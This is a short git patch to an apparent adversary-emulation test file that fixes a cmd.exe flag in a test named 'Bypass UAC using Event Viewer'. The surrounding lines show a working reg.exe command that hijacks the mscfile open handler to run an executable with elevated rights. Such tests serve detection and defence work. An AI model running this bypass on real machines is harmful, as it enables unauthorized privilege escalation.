From 6b6f4beae5b1eededa7525b09e6cf344a587791e Mon Sep 17 00:00:00 2001
From: Ross Wolf <31489089+rw-access@users.noreply.github.com>
Date: Wed, 16 Jan 2019 12:25:04 -0500
Subject: [PATCH] Update flag for cmd.exe (#416)

---
 atomics/T1088/T1088.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/atomics/T1088/T1088.yaml b/atomics/T1088/T1088.yaml
index bbfd9f3d..96f30d8c 100644
--- a/atomics/T1088/T1088.yaml
+++ b/atomics/T1088/T1088.yaml
@@ -20,7 +20,7 @@ atomic_tests:
     name: command_prompt
     command: |
       reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
-      cmd.exe -c eventvwr.msc
+      cmd.exe /c eventvwr.msc
 
 - name: Bypass UAC using Event Viewer - PowerShell
   description: |